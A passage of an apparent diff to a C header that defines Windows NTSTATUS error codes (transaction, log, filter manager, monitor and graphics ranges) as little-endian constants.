+-#define STATUS_TRANSACTIONS_NOT_FROZEN cpu_to_le32(0xC0190045)
+-#define STATUS_TRANSACTION_FREEZE_IN_PROGRESS cpu_to_le32(0xC0190046)
+-#define STATUS_NOT_SNAPSHOT_VOLUME cpu_to_le32(0xC0190047)
+-#define STATUS_NO_SAVEPOINT_WITH_OPEN_FILES cpu_to_le32(0xC0190048)
+-#define STATUS_SPARSE_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190049)
+-#define STATUS_TM_IDENTITY_MISMATCH cpu_to_le32(0xC019004A)
+-#define STATUS_FLOATED_SECTION cpu_to_le32(0xC019004B)
+-#define STATUS_CANNOT_ACCEPT_TRANSACTED_WORK cpu_to_le32(0xC019004C)
+-#define STATUS_CANNOT_ABORT_TRANSACTIONS cpu_to_le32(0xC019004D)
+-#define STATUS_TRANSACTION_NOT_FOUND cpu_to_le32(0xC019004E)
+-#define STATUS_RESOURCEMANAGER_NOT_FOUND cpu_to_le32(0xC019004F)
+-#define STATUS_ENLISTMENT_NOT_FOUND cpu_to_le32(0xC0190050)
+-#define STATUS_TRANSACTIONMANAGER_NOT_FOUND cpu_to_le32(0xC0190051)
+-#define STATUS_TRANSACTIONMANAGER_NOT_ONLINE cpu_to_le32(0xC0190052)
+-#define STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION	\
+-	cpu_to_le32(0xC0190053)
+-#define STATUS_TRANSACTION_NOT_ROOT cpu_to_le32(0xC0190054)
+-#define STATUS_TRANSACTION_OBJECT_EXPIRED cpu_to_le32(0xC0190055)
+-#define STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION cpu_to_le32(0xC0190056)
+-#define STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED cpu_to_le32(0xC0190057)
+-#define STATUS_TRANSACTION_RECORD_TOO_LONG cpu_to_le32(0xC0190058)
+-#define STATUS_NO_LINK_TRACKING_IN_TRANSACTION cpu_to_le32(0xC0190059)
+-#define STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION cpu_to_le32(0xC019005A)
+-#define STATUS_TRANSACTION_INTEGRITY_VIOLATED cpu_to_le32(0xC019005B)
+-#define STATUS_LOG_SECTOR_INVALID cpu_to_le32(0xC01A0001)
+-#define STATUS_LOG_SECTOR_PARITY_INVALID cpu_to_le32(0xC01A0002)
+-#define STATUS_LOG_SECTOR_REMAPPED cpu_to_le32(0xC01A0003)
+-#define STATUS_LOG_BLOCK_INCOMPLETE cpu_to_le32(0xC01A0004)
+-#define STATUS_LOG_INVALID_RANGE cpu_to_le32(0xC01A0005)
+-#define STATUS_LOG_BLOCKS_EXHAUSTED cpu_to_le32(0xC01A0006)
+-#define STATUS_LOG_READ_CONTEXT_INVALID cpu_to_le32(0xC01A0007)
+-#define STATUS_LOG_RESTART_INVALID cpu_to_le32(0xC01A0008)
+-#define STATUS_LOG_BLOCK_VERSION cpu_to_le32(0xC01A0009)
+-#define STATUS_LOG_BLOCK_INVALID cpu_to_le32(0xC01A000A)
+-#define STATUS_LOG_READ_MODE_INVALID cpu_to_le32(0xC01A000B)
+-#define STATUS_LOG_METADATA_CORRUPT cpu_to_le32(0xC01A000D)
+-#define STATUS_LOG_METADATA_INVALID cpu_to_le32(0xC01A000E)
+-#define STATUS_LOG_METADATA_INCONSISTENT cpu_to_le32(0xC01A000F)
+-#define STATUS_LOG_RESERVATION_INVALID cpu_to_le32(0xC01A0010)
+-#define STATUS_LOG_CANT_DELETE cpu_to_le32(0xC01A0011)
+-#define STATUS_LOG_CONTAINER_LIMIT_EXCEEDED cpu_to_le32(0xC01A0012)
+-#define STATUS_LOG_START_OF_LOG cpu_to_le32(0xC01A0013)
+-#define STATUS_LOG_POLICY_ALREADY_INSTALLED cpu_to_le32(0xC01A0014)
+-#define STATUS_LOG_POLICY_NOT_INSTALLED cpu_to_le32(0xC01A0015)
+-#define STATUS_LOG_POLICY_INVALID cpu_to_le32(0xC01A0016)
+-#define STATUS_LOG_POLICY_CONFLICT cpu_to_le32(0xC01A0017)
+-#define STATUS_LOG_PINNED_ARCHIVE_TAIL cpu_to_le32(0xC01A0018)
+-#define STATUS_LOG_RECORD_NONEXISTENT cpu_to_le32(0xC01A0019)
+-#define STATUS_LOG_RECORDS_RESERVED_INVALID cpu_to_le32(0xC01A001A)
+-#define STATUS_LOG_SPACE_RESERVED_INVALID cpu_to_le32(0xC01A001B)
+-#define STATUS_LOG_TAIL_INVALID cpu_to_le32(0xC01A001C)
+-#define STATUS_LOG_FULL cpu_to_le32(0xC01A001D)
+-#define STATUS_LOG_MULTIPLEXED cpu_to_le32(0xC01A001E)
+-#define STATUS_LOG_DEDICATED cpu_to_le32(0xC01A001F)
+-#define STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS cpu_to_le32(0xC01A0020)
+-#define STATUS_LOG_ARCHIVE_IN_PROGRESS cpu_to_le32(0xC01A0021)
+-#define STATUS_LOG_EPHEMERAL cpu_to_le32(0xC01A0022)
+-#define STATUS_LOG_NOT_ENOUGH_CONTAINERS cpu_to_le32(0xC01A0023)
+-#define STATUS_LOG_CLIENT_ALREADY_REGISTERED cpu_to_le32(0xC01A0024)
+-#define STATUS_LOG_CLIENT_NOT_REGISTERED cpu_to_le32(0xC01A0025)
+-#define STATUS_LOG_FULL_HANDLER_IN_PROGRESS cpu_to_le32(0xC01A0026)
+-#define STATUS_LOG_CONTAINER_READ_FAILED cpu_to_le32(0xC01A0027)
+-#define STATUS_LOG_CONTAINER_WRITE_FAILED cpu_to_le32(0xC01A0028)
+-#define STATUS_LOG_CONTAINER_OPEN_FAILED cpu_to_le32(0xC01A0029)
+-#define STATUS_LOG_CONTAINER_STATE_INVALID cpu_to_le32(0xC01A002A)
+-#define STATUS_LOG_STATE_INVALID cpu_to_le32(0xC01A002B)
+-#define STATUS_LOG_PINNED cpu_to_le32(0xC01A002C)
+-#define STATUS_LOG_METADATA_FLUSH_FAILED cpu_to_le32(0xC01A002D)
+-#define STATUS_LOG_INCONSISTENT_SECURITY cpu_to_le32(0xC01A002E)
+-#define STATUS_LOG_APPENDED_FLUSH_FAILED cpu_to_le32(0xC01A002F)
+-#define STATUS_LOG_PINNED_RESERVATION cpu_to_le32(0xC01A0030)
+-#define STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD cpu_to_le32(0xC01B00EA)
+-#define STATUS_FLT_NO_HANDLER_DEFINED cpu_to_le32(0xC01C0001)
+-#define STATUS_FLT_CONTEXT_ALREADY_DEFINED cpu_to_le32(0xC01C0002)
+-#define STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST cpu_to_le32(0xC01C0003)
+-#define STATUS_FLT_DISALLOW_FAST_IO cpu_to_le32(0xC01C0004)
+-#define STATUS_FLT_INVALID_NAME_REQUEST cpu_to_le32(0xC01C0005)
+-#define STATUS_FLT_NOT_SAFE_TO_POST_OPERATION cpu_to_le32(0xC01C0006)
+-#define STATUS_FLT_NOT_INITIALIZED cpu_to_le32(0xC01C0007)
+-#define STATUS_FLT_FILTER_NOT_READY cpu_to_le32(0xC01C0008)
+-#define STATUS_FLT_POST_OPERATION_CLEANUP cpu_to_le32(0xC01C0009)
+-#define STATUS_FLT_INTERNAL_ERROR cpu_to_le32(0xC01C000A)
+-#define STATUS_FLT_DELETING_OBJECT cpu_to_le32(0xC01C000B)
+-#define STATUS_FLT_MUST_BE_NONPAGED_POOL cpu_to_le32(0xC01C000C)
+-#define STATUS_FLT_DUPLICATE_ENTRY cpu_to_le32(0xC01C000D)
+-#define STATUS_FLT_CBDQ_DISABLED cpu_to_le32(0xC01C000E)
+-#define STATUS_FLT_DO_NOT_ATTACH cpu_to_le32(0xC01C000F)
+-#define STATUS_FLT_DO_NOT_DETACH cpu_to_le32(0xC01C0010)
+-#define STATUS_FLT_INSTANCE_ALTITUDE_COLLISION cpu_to_le32(0xC01C0011)
+-#define STATUS_FLT_INSTANCE_NAME_COLLISION cpu_to_le32(0xC01C0012)
+-#define STATUS_FLT_FILTER_NOT_FOUND cpu_to_le32(0xC01C0013)
+-#define STATUS_FLT_VOLUME_NOT_FOUND cpu_to_le32(0xC01C0014)
+-#define STATUS_FLT_INSTANCE_NOT_FOUND cpu_to_le32(0xC01C0015)
+-#define STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND cpu_to_le32(0xC01C0016)
+-#define STATUS_FLT_INVALID_CONTEXT_REGISTRATION cpu_to_le32(0xC01C0017)
+-#define STATUS_FLT_NAME_CACHE_MISS cpu_to_le32(0xC01C0018)
+-#define STATUS_FLT_NO_DEVICE_OBJECT cpu_to_le32(0xC01C0019)
+-#define STATUS_FLT_VOLUME_ALREADY_MOUNTED cpu_to_le32(0xC01C001A)
+-#define STATUS_FLT_ALREADY_ENLISTED cpu_to_le32(0xC01C001B)
+-#define STATUS_FLT_CONTEXT_ALREADY_LINKED cpu_to_le32(0xC01C001C)
+-#define STATUS_FLT_NO_WAITER_FOR_REPLY cpu_to_le32(0xC01C0020)
+-#define STATUS_MONITOR_NO_DESCRIPTOR cpu_to_le32(0xC01D0001)
+-#define STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT cpu_to_le32(0xC01D0002)
+-#define STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM cpu_to_le32(0xC01D0003)
+-#define STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK cpu_to_le32(0xC01D0004)
+-#define STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED cpu_to_le32(0xC01D0005)
+-#define STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK	\
+-	cpu_to_le32(0xC01D0006)
+-#define STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK	\
+-	cpu_to_le32(0xC01D0007)
+-#define STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA cpu_to_le32(0xC01D0008)
+-#define STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK cpu_to_le32(0xC01D0009)
+-#define STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER cpu_to_le32(0xC01E0000)
+-#define STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER cpu_to_le32(0xC01E0001)
+-#define STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER cpu_to_le32(0xC01E0002)
+-#define STATUS_GRAPHICS_ADAPTER_WAS_RESET cpu_to_le32(0xC01E0003)
+-#define STATUS_GRAPHICS_INVALID_DRIVER_MODEL cpu_to_le32(0xC01E0004)
+-#define STATUS_GRAPHICS_PRESENT_MODE_CHANGED cpu_to_le32(0xC01E0005)
+-#define STATUS_GRAPHICS_PRESENT_OCCLUDED cpu_to_le32(0xC01E0006)
+-#define STATUS_GRAPHICS_PRESENT_DENIED cpu_to_le32(0xC01E0007)
+-#define STATUS_GRAPHICS_CANNOTCOLORCONVERT cpu_to_le32(0xC01E0008)
+-#define STATUS_GRAPHICS_NO_VIDEO_MEMORY cpu_to_le32(0xC01E0100)
+-#define STATUS_GRAPHICS_CANT_LOCK_MEMORY cpu_to_le32(0xC01E0101)
+-#define STATUS_GRAPHICS_ALLOCATION_BUSY cpu_to_le32(0xC01E0102)
+-#define STATUS_GRAPHICS_TOO_MANY_REFERENCES cpu_to_le32(0xC01E0103)
+-#define STATUS_GRAPHICS_TRY_AGAIN_LATER cpu_to_le32(0xC01E0104)
+-#define STATUS_GRAPHICS_TRY_AGAIN_NOW cpu_to_le32(0xC01E0105)
+-#define STATUS_GRAPHICS_ALLOCATION_INVALID cpu_to_le32(0xC01E0106)
+-#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE cpu_to_le32(0xC01E0107)
+-#define STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED cpu_to_le32(0xC01E0108)
+-#define STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION cpu_to_le32(0xC01E0109)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE cpu_to_le32(0xC01E0110)
+-#define STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION cpu_to_le32(0xC01E0111)
+-#define STATUS_GRAPHICS_ALLOCATION_CLOSED cpu_to_le32(0xC01E0112)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE cpu_to_le32(0xC01E0113)
+-#define STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE cpu_to_le32(0xC01E0114)
+-#define STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE cpu_to_le32(0xC01E0115)
+-#define STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST cpu_to_le32(0xC01E0116)
+-#define STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE cpu_to_le32(0xC01E0200)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0300)
+-#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED cpu_to_le32(0xC01E0301)
+-#define STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED	\
+-	cpu_to_le32(0xC01E0302)
+-#define STATUS_GRAPHICS_INVALID_VIDPN cpu_to_le32(0xC01E0303)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE cpu_to_le32(0xC01E0304)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET cpu_to_le32(0xC01E0305)
+-#define STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED cpu_to_le32(0xC01E0306)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET cpu_to_le32(0xC01E0308)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET cpu_to_le32(0xC01E0309)
+-#define STATUS_GRAPHICS_INVALID_FREQUENCY cpu_to_le32(0xC01E030A)
+-#define STATUS_GRAPHICS_INVALID_ACTIVE_REGION cpu_to_le32(0xC01E030B)
+-#define STATUS_GRAPHICS_INVALID_TOTAL_REGION cpu_to_le32(0xC01E030C)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE	\
+-	cpu_to_le32(0xC01E0310)
+-#define STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE	\
+-	cpu_to_le32(0xC01E0311)
+-#define STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET cpu_to_le32(0xC01E0312)
+-#define STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY cpu_to_le32(0xC01E0313)
+-#define STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET cpu_to_le32(0xC01E0314)
+-#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET cpu_to_le32(0xC01E0315)
+-#define STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET cpu_to_le32(0xC01E0316)
+-#define STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET cpu_to_le32(0xC01E0317)
+-#define STATUS_GRAPHICS_TARGET_ALREADY_IN_SET cpu_to_le32(0xC01E0318)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH cpu_to_le32(0xC01E0319)
+-#define STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY cpu_to_le32(0xC01E031A)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET	\
+-	cpu_to_le32(0xC01E031B)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE cpu_to_le32(0xC01E031C)
+-#define STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET cpu_to_le32(0xC01E031D)
+-#define STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET cpu_to_le32(0xC01E031F)
+-#define STATUS_GRAPHICS_STALE_MODESET cpu_to_le32(0xC01E0320)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET cpu_to_le32(0xC01E0321)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE cpu_to_le32(0xC01E0322)
+-#define STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN cpu_to_le32(0xC01E0323)
+-#define STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0324)
+-#define STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION	\
+-	cpu_to_le32(0xC01E0325)
+-#define STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES	\
+-	cpu_to_le32(0xC01E0326)
+-#define STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0327)
+-#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE	\
+-	cpu_to_le32(0xC01E0328)
+-#define STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET	\
+-	cpu_to_le32(0xC01E0329)
+-#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET cpu_to_le32(0xC01E032A)
+-#define STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR cpu_to_le32(0xC01E032B)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET cpu_to_le32(0xC01E032C)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET cpu_to_le32(0xC01E032D)
+-#define STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE	\
+-	cpu_to_le32(0xC01E032E)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE cpu_to_le32(0xC01E032F)
+-#define STATUS_GRAPHICS_RESOURCES_NOT_RELATED cpu_to_le32(0xC01E0330)
+-#define STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0331)
+-#define STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE cpu_to_le32(0xC01E0332)
+-#define STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET cpu_to_le32(0xC01E0333)
+-#define STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER	\
+-	cpu_to_le32(0xC01E0334)
+-#define STATUS_GRAPHICS_NO_VIDPNMGR cpu_to_le32(0xC01E0335)
+-#define STATUS_GRAPHICS_NO_ACTIVE_VIDPN cpu_to_le32(0xC01E0336)
+-#define STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY cpu_to_le32(0xC01E0337)
+-#define STATUS_GRAPHICS_MONITOR_NOT_CONNECTED cpu_to_le32(0xC01E0338)
+-#define STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0339)
+-#define STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE cpu_to_le32(0xC01E033A)
+-#define STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE cpu_to_le32(0xC01E033B)
+-#define STATUS_GRAPHICS_INVALID_STRIDE cpu_to_le32(0xC01E033C)
+-#define STATUS_GRAPHICS_INVALID_PIXELFORMAT cpu_to_le32(0xC01E033D)
+-#define STATUS_GRAPHICS_INVALID_COLORBASIS cpu_to_le32(0xC01E033E)
+-#define STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE cpu_to_le32(0xC01E033F)
+-#define STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY cpu_to_le32(0xC01E0340)
+-#define STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT	\
+-	cpu_to_le32(0xC01E0341)
+-#define STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE cpu_to_le32(0xC01E0342)
+-#define STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN cpu_to_le32(0xC01E0343)
+-#define STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL cpu_to_le32(0xC01E0344)
+-#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION	\
+-	cpu_to_le32(0xC01E0345)
+-#define STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED \
+-	cpu_to_le32(0xC01E0346)
+-#define STATUS_GRAPHICS_INVALID_GAMMA_RAMP cpu_to_le32(0xC01E0347)
+-#define STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED cpu_to_le32(0xC01E0348)
+-#define STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED cpu_to_le32(0xC01E0349)
+-#define STATUS_GRAPHICS_MODE_NOT_IN_MODESET cpu_to_le32(0xC01E034A)
+-#define STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON	\
+-	cpu_to_le32(0xC01E034D)
+-#define STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE cpu_to_le32(0xC01E034E)
+-#define STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE cpu_to_le32(0xC01E034F)
+-#define STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS	\
+-	cpu_to_le32(0xC01E0350)
+-#define STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING cpu_to_le32(0xC01E0352)
+-#define STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED cpu_to_le32(0xC01E0353)
+-#define STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS cpu_to_le32(0xC01E0354)
+-#define STATUS_GRAPHICS_INCOMPATIBLE_PRIVATE_FORMAT cpu_to_le32(0xC01E0355)
+-#define STATUS_GRAPHICS_INVALID_MODE_PRUNING_ALGORITHM cpu_to_le32(0xC01E0356)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_CAPABILITY_ORIGIN	\
+-	cpu_to_le32(0xC01E0357)
+-#define STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE_CONSTRAINT	\
+-	cpu_to_le32(0xC01E0358)
+-#define STATUS_GRAPHICS_MAX_NUM_PATHS_REACHED cpu_to_le32(0xC01E0359)
+-#define STATUS_GRAPHICS_CANCEL_VIDPN_TOPOLOGY_AUGMENTATION	\
+-	cpu_to_le32(0xC01E035A)
+-#define STATUS_GRAPHICS_INVALID_CLIENT_TYPE cpu_to_le32(0xC01E035B)
+-#define STATUS_GRAPHICS_CLIENTVIDPN_NOT_SET cpu_to_le32(0xC01E035C)
+-#define STATUS_GRAPHICS_SPECIFIED_CHILD_ALREADY_CONNECTED	\
+-	cpu_to_le32(0xC01E0400)
+-#define STATUS_GRAPHICS_CHILD_DESCRIPTOR_NOT_SUPPORTED cpu_to_le32(0xC01E0401)
+-#define STATUS_GRAPHICS_NOT_A_LINKED_ADAPTER cpu_to_le32(0xC01E0430)
+-#define STATUS_GRAPHICS_LEADLINK_NOT_ENUMERATED cpu_to_le32(0xC01E0431)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_ENUMERATED cpu_to_le32(0xC01E0432)
+-#define STATUS_GRAPHICS_ADAPTER_CHAIN_NOT_READY cpu_to_le32(0xC01E0433)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_STARTED cpu_to_le32(0xC01E0434)
+-#define STATUS_GRAPHICS_CHAINLINKS_NOT_POWERED_ON cpu_to_le32(0xC01E0435)
+-#define STATUS_GRAPHICS_INCONSISTENT_DEVICE_LINK_STATE cpu_to_le32(0xC01E0436)
+-#define STATUS_GRAPHICS_NOT_POST_DEVICE_DRIVER cpu_to_le32(0xC01E0438)
+-#define STATUS_GRAPHICS_ADAPTER_ACCESS_NOT_EXCLUDED cpu_to_le32(0xC01E043B)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_COPP_SEMANTICS \
+-	cpu_to_le32(0xC01E051C)
+-#define STATUS_GRAPHICS_OPM_INVALID_INFORMATION_REQUEST cpu_to_le32(0xC01E051D)
+-#define STATUS_GRAPHICS_OPM_DRIVER_INTERNAL_ERROR cpu_to_le32(0xC01E051E)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_DOES_NOT_HAVE_OPM_SEMANTICS \
+-	cpu_to_le32(0xC01E051F)
+-#define STATUS_GRAPHICS_OPM_SIGNALING_NOT_SUPPORTED cpu_to_le32(0xC01E0520)
+-#define STATUS_GRAPHICS_OPM_INVALID_CONFIGURATION_REQUEST	\
+-	cpu_to_le32(0xC01E0521)
+-#define STATUS_GRAPHICS_OPM_NOT_SUPPORTED cpu_to_le32(0xC01E0500)
+-#define STATUS_GRAPHICS_COPP_NOT_SUPPORTED cpu_to_le32(0xC01E0501)
+-#define STATUS_GRAPHICS_UAB_NOT_SUPPORTED cpu_to_le32(0xC01E0502)
+-#define STATUS_GRAPHICS_OPM_INVALID_ENCRYPTED_PARAMETERS cpu_to_le32(0xC01E0503)
+-#define STATUS_GRAPHICS_OPM_PARAMETER_ARRAY_TOO_SMALL cpu_to_le32(0xC01E0504)
+-#define STATUS_GRAPHICS_OPM_NO_PROTECTED_OUTPUTS_EXIST cpu_to_le32(0xC01E0505)
+-#define STATUS_GRAPHICS_PVP_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME	\
+-	cpu_to_le32(0xC01E0506)
+-#define STATUS_GRAPHICS_PVP_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP	\
+-	cpu_to_le32(0xC01E0507)
+-#define STATUS_GRAPHICS_PVP_MIRRORING_DEVICES_NOT_SUPPORTED	\
+-	cpu_to_le32(0xC01E0508)
+-#define STATUS_GRAPHICS_OPM_INVALID_POINTER cpu_to_le32(0xC01E050A)
+-#define STATUS_GRAPHICS_OPM_INTERNAL_ERROR cpu_to_le32(0xC01E050B)
+-#define STATUS_GRAPHICS_OPM_INVALID_HANDLE cpu_to_le32(0xC01E050C)
+-#define STATUS_GRAPHICS_PVP_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE	\
+-	cpu_to_le32(0xC01E050D)
+-#define STATUS_GRAPHICS_PVP_INVALID_CERTIFICATE_LENGTH cpu_to_le32(0xC01E050E)
+-#define STATUS_GRAPHICS_OPM_SPANNING_MODE_ENABLED cpu_to_le32(0xC01E050F)
+-#define STATUS_GRAPHICS_OPM_THEATER_MODE_ENABLED cpu_to_le32(0xC01E0510)
+-#define STATUS_GRAPHICS_PVP_HFS_FAILED cpu_to_le32(0xC01E0511)
+-#define STATUS_GRAPHICS_OPM_INVALID_SRM cpu_to_le32(0xC01E0512)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_HDCP cpu_to_le32(0xC01E0513)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_ACP cpu_to_le32(0xC01E0514)
+-#define STATUS_GRAPHICS_OPM_OUTPUT_DOES_NOT_SUPPORT_CGMSA	\
+-	cpu_to_le32(0xC01E0515)
+-#define STATUS_GRAPHICS_OPM_HDCP_SRM_NEVER_SET cpu_to_le32(0xC01E0516)
+-#define STATUS_GRAPHICS_OPM_RESOLUTION_TOO_HIGH cpu_to_le32(0xC01E0517)
+-#define STATUS_GRAPHICS_OPM_ALL_HDCP_HARDWARE_ALREADY_IN_USE	\
+-	cpu_to_le32(0xC01E0518)
+-#define STATUS_GRAPHICS_OPM_PROTECTED_OUTPUT_NO_LONGER_EXISTS	\
+-	cpu_to_le32(0xC01E051A)
+-#define STATUS_GRAPHICS_OPM_SESSION_TYPE_CHANGE_IN_PROGRESS	\
+-	cpu_to_le32(0xC01E051B)
+-#define STATUS_GRAPHICS_I2C_NOT_SUPPORTED cpu_to_le32(0xC01E0580)
+-#define STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST cpu_to_le32(0xC01E0581)
+-#define STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA cpu_to_le32(0xC01E0582)
+-#define STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA cpu_to_le32(0xC01E0583)
+-#define STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED cpu_to_le32(0xC01E0584)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_DATA cpu_to_le32(0xC01E0585)
+-#define STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE \
+-	cpu_to_le32(0xC01E0586)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING	\
+-	cpu_to_le32(0xC01E0587)
+-#define STATUS_GRAPHICS_MCA_INTERNAL_ERROR cpu_to_le32(0xC01E0588)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND cpu_to_le32(0xC01E0589)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH cpu_to_le32(0xC01E058A)
+-#define STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM cpu_to_le32(0xC01E058B)
+-#define STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE cpu_to_le32(0xC01E058C)
+-#define STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS cpu_to_le32(0xC01E058D)
+-#define STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED cpu_to_le32(0xC01E05E0)
+-#define STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME	\
+-	cpu_to_le32(0xC01E05E1)
+-#define STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP	\
+-	cpu_to_le32(0xC01E05E2)
+-#define STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED cpu_to_le32(0xC01E05E3)
